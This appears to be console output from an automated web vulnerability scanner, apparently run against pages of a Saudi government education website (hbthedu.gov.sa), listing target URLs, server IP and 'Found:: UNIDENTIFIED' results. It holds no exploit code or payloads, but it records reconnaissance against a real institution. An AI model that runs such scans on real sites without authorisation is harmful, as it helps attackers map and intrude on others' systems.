 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 19 / 100 ]-[04:08:12] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8991 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 20 / 100 ]-[04:08:13] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1349 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 21 / 100 ]-[04:08:15] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/258 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 22 / 100 ]-[04:08:17] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/968 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 23 / 100 ]-[04:08:18] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8548 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 24 / 100 ]-[04:08:20] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2215 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 25 / 100 ]-[04:08:21] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8472 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 26 / 100 ]-[04:08:23] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8697 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 27 / 100 ]-[04:08:28] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1004 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 28 / 100 ]-[04:08:30] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8478 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 29 / 100 ]-[04:08:31] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2944 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 30 / 100 ]-[04:08:33] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8643 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 31 / 100 ]-[04:08:34] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8458 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 32 / 100 ]-[04:08:36] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9179 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 33 / 100 ]-[04:08:38] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8899 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 34 / 100 ]-[04:08:40] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8495 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 35 / 100 ]-[04:08:43] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/mailbox ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 36 / 100 ]-[04:08:46] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9206 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 37 / 100 ]-[04:08:49] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8715 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 38 / 100 ]-[04:08:51] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8826 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 39 / 100 ]-[04:08:52] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8599 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 40 / 100 ]-[04:08:54] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8453 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 41 / 100 ]-[04:08:58] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8487 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 42 / 100 ]-[04:09:00] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/682 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 43 / 100 ]-[04:09:03] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8719 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 44 / 100 ]-[04:09:04] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2609 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 45 / 100 ]-[04:09:06] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/952 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 46 / 100 ]-[04:09:07] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9033 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 47 / 100 ]-[04:09:09] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1005 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 48 / 100 ]-[04:09:10] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/944 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 49 / 100 ]-[04:09:12] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2120 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 50 / 100 ]-[04:09:13] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/819 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 51 / 100 ]-[04:09:14] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9195 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 52 / 100 ]-[04:09:16] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/824 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 53 / 100 ]-[04:09:18] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/375 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 54 / 100 ]-[04:09:19] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9053 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 55 / 100 ]-[04:09:21] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9139 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 56 / 100 ]-[04:09:23] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/553 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 57 / 100 ]-[04:09:24] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2212 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 58 / 100 ]-[04:09:25] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 59 / 100 ]-[04:09:27] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9152 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 60 / 100 ]-[04:09:31] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9090 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 61 / 100 ]-[04:09:34] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9198 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 62 / 100 ]-[04:09:35] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9166 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 63 / 100 ]-[04:09:38] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/33/الموهوبون ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 64 / 100 ]-[04:09:41] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/guestbook/l ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 65 / 100 ]-[04:09:42] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lpress ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 66 / 100 ]-[04:09:44] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/quiz/new ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 67 / 100 ]-[04:09:46] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/55 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 68 / 100 ]-[04:09:48] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/10 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 69 / 100 ]-[04:09:49] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/tags/l ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 70 / 100 ]-[04:09:51] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lspe ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 71 / 100 ]-[04:09:52] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/event/new ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 72 / 100 ]-[04:09:53] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lmedia ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 73 / 100 ]-[04:09:55] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/sitemap/l ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 74 / 100 ]-[04:09:56] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/media/ltv ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 75 / 100 ]-[04:09:58] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/saying/l ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 76 / 100 ]-[04:09:59] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/247 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 77 / 100 ]-[04:10:01] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/quiz/old ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 78 / 100 ]-[04:10:03] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/release/lpub ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 79 / 100 ]-[04:10:04] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/504 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 80 / 100 ]-[04:10:07] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/30/p/23 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 81 / 100 ]-[04:10:09] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/12/شؤون-المعلمين ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 82 / 100 ]-[04:10:11] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/149 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 83 / 100 ]-[04:10:12] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/75 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 84 / 100 ]-[04:10:16] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/111 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 85 / 100 ]-[04:10:17] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/142 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 86 / 100 ]-[04:10:19] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/183 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 87 / 100 ]-[04:10:21] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/32 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 88 / 100 ]-[04:10:23] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/95 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 89 / 100 ]-[04:10:25] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/134 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 90 / 100 ]-[04:10:27] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/61 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 91 / 100 ]-[04:10:30] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/78 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 92 / 100 ]-[04:10:35] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/3/p/14 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 93 / 100 ]-[04:10:39] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/22/التدريب-التربوي ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 94 / 100 ]-[04:10:42] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/68 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

